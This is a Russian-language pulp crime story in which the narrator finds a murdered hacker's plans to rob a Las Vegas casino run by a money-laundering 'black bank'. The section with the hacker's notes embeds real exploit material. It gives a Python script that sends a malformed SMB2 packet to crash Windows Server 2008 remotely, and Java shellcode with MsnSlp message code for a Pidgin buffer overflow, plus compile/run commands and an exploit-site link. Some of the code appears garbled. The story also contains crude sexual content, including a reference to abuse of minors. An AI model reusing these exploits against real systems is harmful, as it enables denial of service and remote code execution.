Vegas Hack

Сервер стоит в комнате под замком и физически отключить его не получиться. Слава богу там есть вай-фай, который и раздается через него же. Значит можно попробовать ломануть удаленно. Nmap показал что там стои Windows Server 2008, значит все таки шанс есть. Порывшись пару часов в гугле я нашел интересную информацию, оказывается в Windows Vista, Server 2008, и Windows 7 RC используют уязвимую технологию SMB2. Чем можно воспользоваться и вызвать удаленно B.S.O.D
Vegas HackКМВАльфаТранс — крупнейший в России, так называемый, «черный банк», около сотни филиалов по всему миру, десятки букмекерских контор и даже два казино в Лас-Вегасе. Да, да, Лас-Вегас — мечта миллионов, игровой рай, вселенная желаний и больших денег. Они действительно построили свой мир, с блек-джеком и шлюхами. Мир реальной прибыли и иллюзорной бутафории. Здесь все эфемерно — улыбки крупье и парковщиков, томный взгляд девочек по вызову и рукопожатии банкира выдающего тебе очередной кредит, под залог серебристого мерседеса, на который ты батрачил пять лет без выходных и праздников. Посейдон не был настолько двуличен и безжалостен, разбивая корабли древних викингов о бездушные и холодные скалы, как эти эти люди с кипельно белыми сорочками и тщательно прилизанной челкой на манер Элтона Джона. Лас-Вегас — тюрьма денежного режима, отсюда невозможно найти выход, по крайней мере пока на твоих депозитах еще лежит круглая сумма. Если бы пылесос засасывая пыль старался хотя бы на половину возможности местных проституток — то его производитель стал бы миллиардером, а мы бы навсегда избавились от грязи. Эти женщины знают свое дело, хотя учитывая их расценки, сложно представить иного результата. Выложить за полчаса, пусть и неземного траха, несколько тысяч евро способен далеко не каждый успешный бизнесмен, не говоря уже о простых смертных. Впрочем таких там и не ждут. Здесь рады только детишкам олигархов и их толстым женам, трясущими целюлитной жопой возле стола с рулеткой или покером, пока их мужья, с животной похотью, насаживают малолеток на свои обрезиненные концы. Зачем люди выбрасывают миллионы, заработанные адским трудом или доставшиеся от дяди педофила? Кто-то от безысходности и отвергнутой любви, кто-то от ранней импотенции или сифилиса, подобранного в бурной молодости. А кто-то просирает все свое состоянии просто так, просто от того, что оно у него есть. Помню как на последней работе коллега на философский вопрос «В чем смысл жизни?» любил повторять «Ебаться и дружить! Ебаться и дружить!», хотя и то и другое у него было не чаще чем пятерки у дебила по мат.анализу в школе для умственно отсталых.
ПРИВЕТ ИЗ 90-хх
КМВАльфаТранс появилась в далеком 1998 году, и представляла собой, как тогда всем казалось, один из многих банков-однодневок, которые в конце девяностых плодились как грибы после дождя. Пройдет около десяти лет и маленькая фирма с тремя сотрудниками превратится в своеобразную майкрософт от мира темного нала. Отмывка денег, собственные каналы доставки и сбыта наркотиков, проституция, игорный бизнес и уход от налогов в невиданных доселе объемах. Во время первой чеченской компании они занимались переправкой оружия боевикам, чем вызвали очень большой интерес спецслужб, но проведенное расследование ничего не дало, потому, что у кого-то из начальников гос. структур на оффшорном счете вовремя появилась шестизначная сумма и на этом все закончилось. Как щупальце гигантского осьминога организация протискивалась во все отделы государственной власти и стягивала правительственный аппарат, вовремя создавая себе зеленные коридоры и продвигая нужные законопроекты.
В ноябре 2006 года на совете директоров компании КМВАльфаТранс было принято постановление об открытии двух крупнейших казино в Лас-Вегасе с целью первой стадии очистки денежного трафика перед его последующим оседании на кайманах, бермудах и еще паре десятков небольших островов. После этого деньги переводились на тысячи однодневных счетов физических и юридических посредников, в этот же деньги вливались на биржу одними людьми и забирались другими. И так продолжается в течении недели. После этого деньги снова возвращались в «черный банк» и становились чистыми и прозрачными как душа младенца. В течении трех лет владельцам новоявленной корпорации хватало денег на яхты, нефтяные скважины и десятки эксклюзивных моделей машин во дворе собственного дворца в Италии. Но в 2009 году получив в правительстве 82% своих людей они пошли намного дальше. Было решено построить третье и самое большое в истории игорного бизнеса казино. Добро пожаловать в «Брильянтовые земли», четырехэтажное здание общей площадью более двух квадратных километров. Три золотых и один платиновый залы. Ну и конечно, какое казино обходиться без сокровещницы.
Vegas Hack
Смити и платиновые короли
Нет это не бункер с золотом, это всего-лишь небольшая комната с несколькими серверами и десятком мониторов. Это электронное сердце здания, отсюда идет управление и мониторинг всех камер наблюдение, постоянное сканирование столов, фишек и игровых автоматов. Всей пройгрыши, выйгрыши, все джекпоты и даже простая раздача фишек проходит через эту комнату. Получив доступ к этой комнате можно за пару часов полностью заработать себе на безбедную старость, но вся загвоздка в том, что она охраняется по круче национального золото хранилища. Кстати, забыл сказать, в «Брильянтовых землях» она называется «красная комната». Почему? Да потому что в ней абсолютно все красных оттенков — стены, пол, столы, компьютеры. Там даже есть большой красный диван, на котором частенько валяется Смити. Ах да, забыл представить Смити — электронный хранитель казино, разработчик системы сканирования фишек и распознавание выигрышных ситуаций на автоматах. Дерзкий, самоуверенный 25 летний парень со стальным взглядом и десяти миллионным состоянием. Наверное самый богатый программист заработавший такую сумму на одной разработке за полгода. Именно полгода назад он впервые зашел в это казино и сорвал три джекпота, найдя брешь в системе генерации состояний игровых автоматов, затем выбил три зуба одному охраннику, а другого послал в нокаут и раздавил ему селезенку. Затем он поднялся кабинет директору, из которого он уже вышел владельцем красной комнаты и одним из тринадцати «платиновых королей». Платиновых королей тоже придумал смити уже после того, как разработал и запустил свою систему слежения и управления казино.
Фишки — маленькие круглые диски из легкого металла, содержащие внутри идентификационный номер, позволяющий узнать принадлежность к казино и стоимость ставки. Хотя фишки были изобретены еще пару сотен лет назад игроками в покер, в их идеологии и производстве почти ничего не изменялось, пока не пришел Смити. После того, как он создал свою систему, в каждом игровом столе стоял сканер фишек, проверяющий законность и подлинность ставки. И вот однажды в его голову пришла идея о создании особых фишек, позволяющим своим людям выигрывать на любом столе и любой игре. В итоге он стал продавать без проигрышные ставки за очень большие деньги, несколько фишек было у руководства казино, одна у Смити и около пяти у местных богачей. Все эти «платиновые короли» были внесены в базу данных, и когда сканер замечал такую фишку, он передавал в красную комнату сигнал, на третий слева экран поступала информация о владельце, его выигрышах и ставках. Делалось это для того, чтобы фишками не смог воспользоваться другой человек. Естественно владельцы КМВАльфаТранса ничего об этом не знали и Смити вместе с тринадцатью платиновыми королями молчали как рыбы.
Vegas Hack
Реальная опасность
Все началось три месяца назад, когда я переехал в США. Учился в хорошем университете, ел барбекю по выходным и каждую неделю ходил на бейсбол глазеть на полуголых девиц из команды поддержки. Точно помню, была среда, июнь. Термометр зашкаливал, над дорогой стояло марево, в салоне моего дряхлого универсала было наверное градусов под 60 по Цельсию. Припарковавшись у небольшого дома, я быстро просеменил до входной двери. Хотя моих денег хватило бы на съем отдельного жилища, ради экономии я снимал его с одним парнем — Крисом Паркером. За три месяца я видел его всего лишь пять раз. Домой он приходил либо очень поздно, или, что чаще, вообще не приходил неделями. Единственное что мне удалось узнать — это то, что он занимался компьютерной безопасностью, а чем конкретно так и оставалось загадкой, до того самого момента, как я приехал домой чуть раньше обычного. Зайдя в коридор я сразу ринулся к холодильнику, который похоронил мои надежды на возможное прохлождение моего измученного жарой организма. Морозилка была забита сардельками и алюминиевыми баночками с колой, от которой у меня сильно сводило желудок, поэтому глотнув воды из под крана я угрюмо поо было плелся в комнату. но не зашел, что-то было не так. Секунд двадцать расплавленный мозг пытался понять причину ступора. Глянув налево по коридору я увидел, что дверь Криса была приоткрыта. Мало того, что Паркера никогда не было дома днем, так и дверь он всегда закрывал изнутри, даже по ночам, размеренно стуча по клавишам. Но сейчас в комнате была тишина. Подумав о грабителях я на цыпочках подкрался к комнате, но там по прежнему была гробовая тишина. Успокоившись, я распахнул дверь и… И увидел картину навсегда врезавшуюся в мою память. Моему взору предстала небольшая комната, справа у стены стоял диван, на котором лежал белый нетбук с открытым вордовским документом. Половина жидкокристаллического экрана была залита красной пленкой еще свежей крови. По середине комнаты на полу лежало два трупа. Один из них был Крис Паркер, на его спине были видны следы от пуль, он был похож на решето. Рядом с ним был человек с небольшим ручным автоматом, на его горле был огромный разрез, откуда пульсирую сбегала ручейком кровь. В руке криса был нож, и надпись кровью, на сером паркете, видимо сделанная им перед тем как его дыханье оборвалось — «на флешке всё. беги!». Сдерживая рвотные порывы, я подошел к нетбуку и вдруг услышал шум припаркованного автомобиля у дома, выглянул окно и увидел трех человек, они явно направлялись ко мне. Один из них измывая от жары расстегнул костюм, обнажив кобуру черного пистолета, очень выделяющегося на фоне белоснежной, но уже промокшей от пота сорочки. Вспомнив кучу фильмов про гангстеров и убийц я похолодел. Нет, нет, стоп! Так не бывает, это же не кино! Это скорее всего полицейские. Но почему они без формы? Наверное под прикрытием, поэтому и в штатском!
Мои нервные рассуждения прервал звук выстрела и разбившегося стекла! Они заметили меня и начали стрелять! Стрелять из настоящего оружия, по живому человеку, они ведь даже не знают кто я!!! Дальше все было как в дымке — я схватил окровавленный ноут и выпрыгнул в заднее окно и побежал. Никогда не имев пристрастия к физкультуре я бежал так, что мог бы выиграть любую олимпиаду по легкой атлетике. Я слышал крики позади меня, я слышал выстрелы и кажеться даже видел как летят пули, я чувствовал как кислота наполняет мышцы, как связки натягиваются будто струны на гитаре музыканта играющего соло на рок-концерте. Сколько я бежал? Минуту, пять, двадцать? Не знаю, или не хочу знать, но это были самые долгие и самые страшные минуты в моей жизни. Что чувствует человек на грани смерти, спросите вы? Ни-че-го! абсолютно ничего, лишь только бешеный стук в висках и желание выжить, страх отключает все эмоции, остаются лишь первобытный инстинкт выживания. Будто переносишся на несколько тысячелетий назад и пересекаешь густые заросли амазонских лесов спасаясь от еще не вымершего саблезубого тигра.
Лишь ближе к ночи, когда на небе показались первые звезды, я перестал прятаться по темным переулкам и в каждом человеке видеть киллера. Поймав такси я добрался до границы штата Невада и поселился там в недорогом мотеле. Только после хорошего душа и сытного ужина я смог прийти в себя и привести мысли в порядок, вспомнив про ноут. Бегло просмотрев содержимое флешки я наконец-то понял что ко мне попало, что собирался делать Крис и за что его убили. Теперь понятно какой безопасностью он занимался. Усевшись в кресло и жуя остатки пиццы с анчоусами я начал изучать его планы.
Vegas Hack
Записи Криса
Долго промучившись я смог наконец-то найти где Смити прячет еще одну, последнюю платиновую фишку и алгоритмы расчета игр казино. Нет это не бункер и даже не банк, этим местом оказалась камера хранения на вокзале небольшого городка на юге Невады. Этот парень просто дьявол, он обводит вокруг пальца как руководство казино, так и самых главных людей из КМВАльфаТранс, они пока не смогли этого доказать, поэтому теперь свое расследование буду вести я сам. Меня ему не провести, я точно чую, что здесь что-то нечисто, он из под носа основателей уводит миллионы, но все оепрации идут по его технологиям,и только ему известных алгоритмам, поэтому надо быстро распутать все ниточки, пока я еще жив. Двум прошлым любопытным людям повезло меньше, одного переехал грузовик, а другой уснул и не проснулся. Конечно это все подстроил он, но доказать это невозможно.Пока.
Так нужно проникнуть к камере хранения, для этого нужно решить две проблемы — охранник проверяющий карточки и камеры наблюдения записывающие всех кто там был. За неделю исследований было выяснено что все видео пишеться на ихний сервер. Его нужно на пару минут будет отключить. Сервер стоит в комнате под замком и физически отключить его не получиться. Слава богу там есть вай-фай, который и раздается через него же. Значит можно попробовать ломануть удаленно. Nmap показал что там стои Windows Server 2008, значит все таки шанс есть. Порывшись пару часов в гугле я нашел инересную информацию, оказываетсья в Windows Vista, Server 2008, и Windows 7 RC используют уязвимую технологию SMB2. Чем можно воспользоваться и вызвать удаленно B.S.O.D
SMB (сокр. от англ. server message block) — формат сообщений на основе протокола совместного использования файлов Microsoft/3Com, используемый для передачи файловых запросов (open — открыть, close — закрыть, read — прочитать, write — записать и т. п.) между клиентами и серверами.
SMB обеспечивает сервис прикладного уровня (уровень 7 «Application layer» в модели OSI) и по умолчанию имеtт номер порта 445 и работает поверх TCP. Правильно сформировав пакет и установив «Process ID Hight» я смогу прервать запись на некоторое время, пока сервер будут перезагружать. Для того достаточно выполнить вот этот код (на питоне):

from socket import socket
host = "192.168.0.1" 445 #указываем айпишик и порт
buff = (
"x00x00x00x90" # Начало SMB заголовка: сообщение сессии
"xffx53x4dx42" # Серверный компонент: SMB
"x72x00x00x00" # Negociate протокол, посылается при первом коннекте клиента с сервером, служит для определения определения диалекта SMB
"x00x18x53xc8" # Операция 0x18 & sub 0xc853
"x00x26"# Process ID High. Для нормального значения нужно заменить на "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe"
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54"
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31"
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00"
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57"
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61"
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c"
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c"
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e"
"x30x30x32x00"
)
s = socket()#создаем сокет
s.connect(host)#коннектимся к хосту
s.send(buff)#отправляем пакет
s.close()#отключаемся

Как я понял пока патч еще не выпустили, и единственное решение проблемы это отключить эту службу и прикрыть порты. Надеюсь этого они еще не сделали. Предыдущие версии окошек не упадут по причине отсутствия драйвера SRV2.SYS, а у охранника стоит ХР, и с ним фокус не пройдет. Здесь пришлось долго повозиться, но зацепка нашлась. Генри, коренастый охранник небольшого роста очень любит общаться со своими друзьями через MSN, и использует он для этого дела Pidgin. Хотя уязвимости подвержен не только сам Pidgin но и любая программа использующая Pidgin-libpurple/libmsn библиотеку. Правильно составленные MsnSlp-пакеты способны привести к переполнению буфера и выполнению нужного нам кода. Для начала нужно написать шеллкод, вот что предлагают xакеры из http://www.indahax.com/

private byte shellcode[] = new byte[] {

          
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,            
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };

Это вызов на атакуемой машине калькулятора, но этим нам недобиться того, чтобы отвлечь оxранника, поэтому придеться заменить последнии 8 байт(начиная с предпоследнего) на вот эти и вместо стандартного калькулятора получим «shutdown -s -f -t 40 -c «Fuck You!»», этой строчкой мы выведем окошко принудительного выключения винды через 40 секунд. Обычно для отключения этого безобразия нужно всего лишь набрать «shutdown -a», но он об этом врятли знает. Далее правильно записанный в сообщение шеллкод нужно послать через мсн:

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);
//Этот флаг создает фиктивный MsnSlp-пакет в памяти приложения с буфером указывающим на null
//Мы используем этот буфер для перезаписи стека
  msg.setFlag(0x1000020);
  msg.setP2PDest(target);
  switchboard.sendMessage(msg);

Как сформировать правильное сообщение и инициализировать код можно посмотреть вот здесь http://www.milw0rm.com/exploits/9615
Далее сливаем вот отсюда ява-библиотеку для работы с MSN http://sourceforge.net/projects/java-jml/ , затем компилируем и запускаем во таким образом:
javac.exe -cp «%classpath%;.jml-1.0b3-full.jar» PidginExploit.java
java -cp «%classpath%;.jml-1.0b3-full.jar» PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
Чтобы ничего не вредоносного не сработало, Генри всего-лишь нужно было обновиться до версии 2.5.9, но он об этом не знает и слава богу.

Что же делать?
Дальше еще было листов пару сотен листов описания для взлома пропускной системы казино и серверов, через которые шли платежки, подделка платиновой фишки(!), вся информация по КМВАльфаТранс и много другое. Там было все до самыx мелочей, даже адреса счетов и пароли куда поступили его гонорары, судя по его записям он и не собирался сдавать Смити, он сам xотел получить все разработки и свалить куда подальше с очень кругленькой суммой. Крис Паркер распланировал все до последнего байта и вот-вот совершил бы это, если бы не был настолько продырявленным из автомата. Чтоже делать? Меня все равно ищут, и скорее всего найдут, и тогда моя участь будет не лучше его. Как говориться лучшая защита это нападение, тем более, что у меня уже есть продуманная карта действий. Завтра приступим, а пока можно бы и поспать, день просто сегодня как из xудшиx фантазий душевнобольного…
Vegas HackVegas Hack